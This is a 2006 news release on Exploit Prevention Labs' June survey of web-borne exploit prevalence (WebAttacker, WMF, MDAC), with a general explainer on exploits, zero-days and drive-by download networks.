Exploit Prevention Labs Releases Exploit Prevalence Survey for Month of June

WebKnowHow
Tuesday, July 11, 2006; 03:15 AM

Exploit Prevention Labs, developer of anti-exploit protection, released findings for its Exploit Prevalence Survey for the month of June. The Exploit Prevalence Survey, which debuted on June 8, is a monthly survey to measure the top web-borne exploits based on real-world prevalence data.

The survey results are derived from automated reports submitted by users of Exploit Prevention Labs’ SocketShield anti-exploit software in addition to information captured from the company’s network of hunting-pots. A free trial download of the SocketShield software is available at http://www.explabs.com.

Among the key findings, WebAttacker-generated exploits rose to the number one position, accounting for 32 percent of reported exploits in June compared to 24 percent in May. Incidences of the Windows Metafile (WMF) exploit, which appeared and spread rapidly at the end of 2005, dropped to the number four position from number one in the previous month, accounting for only 15 percent of reported exploits in June compared to 33 percent in May.

According to Roger Thompson, CTO of Exploit Prevention Labs and author of the survey, the WebAttacker script, which criminals use to distribute and launch exploits, may be increasing in popularity because it requires little technical knowledge for the criminals to operate, while the WMF exploit may have declined because users have now had six months to patch for it.

“We are keeping a particularly close eye on the Web Attacker-generated MDAC exploits, which are actually more prevalent than is reflected by the data,” adds Thompson. “We've found four separate MDAC scripts so far and fully expect that number to increase over the coming weeks.”

The overall prevalence of exploits, according to Thompson, remained fairly steady in June compared to May, primarily because there have been few major software vulnerabilities discovered since March of this year. But this current calm should not be cause for complacency.

Despite the relatively unchanged landscape, Thompson believes the cyber criminals are prepared to take advantage of the next big vulnerability discovery. “There are multiple exploit distribution networks on the web that control tens of thousands of “lure” web sites, all of which are being used to distribute malware by drive-by download to unpatched PCs,” says Thompson. “Once the next big vulnerability is discovered and an exploit is written for it, the bad guys can quickly introduce it to their networks.”

In a further development, July has been designated a “Month of Browser Bugs” by security researcher, HD Moore. Through his Metasploit project, he has been stockpiling browser bugs, and is planning to release one each day for the month of July. He says that most will be for Internet Explorer, with a handful for other browsers. Thompson said, “The first few seem to be nothing more than browser crashers, but it will be interesting to see how many of them end up being exploitable, and if they are, how many end up being used by the bad guys.”

What are Exploits?

Exploits are malware applications that take advantage of security vulnerabilities in common software applications such as Windows operating systems and browsers. Unlike traditional malware, such as viruses or trojans that are usually created by thrill-seeking individuals trying to cause chaos, exploits are part of a growing category of malicious and frequently for-profit applications used by international criminal cyber gangs.

Zero-day exploits, an especially dangerous form of exploit, are exploits for which no patches are yet available. Once software vulnerabilities are discovered, it typically takes the software developer anywhere from three weeks to six months to develop a patch, because the patches must be rigorously tested to ensure they don’t cause other system instabilities. On the other hand, exploit developers are not bothered by such concepts as quality assurance and application conflicts, and can release their code very quickly, often the same day a vulnerability is uncovered.

Most exploit infections occur by what’s known as a drive-by download, in which malicious code is force-downloaded onto a user’s computer without their knowledge. This occurs the moment the user visits a compromised web site, which may well appear completely innocuous. The payload, usually in the form of a rootkit, then exposes the user to damage from spyware, keyloggers, and other crimeware.

Many Internet users mistakenly believe as long as they’re not visiting pornographic or illegal file sharing sites, they’re safe from exploits. The truth, however, is that even trusted web sites cannot always be trusted.

Similar to the business model employed by spammers, the exploit distributors use a tiered distribution system, usually composed of a single master exploit server that controls a large network of servers hosting innocent-seeming web sites that in turn act as lures for unsuspecting visitors. Exploit Prevention Labs has discovered numerous exploit distribution networks in which up to 20,000 trusted and legitimate web sites had been hacked by cyber criminals who were using those sites to spread exploits.

When a surfer visits one of the sites, malicious code placed on the site silently connects to an exploit server operated by the criminals and attempts to deliver the drive-by download onto the user’s machine. If the web surfer is using an operating system or browser that is unpatched for the latest vulnerabilities, their machine is infected.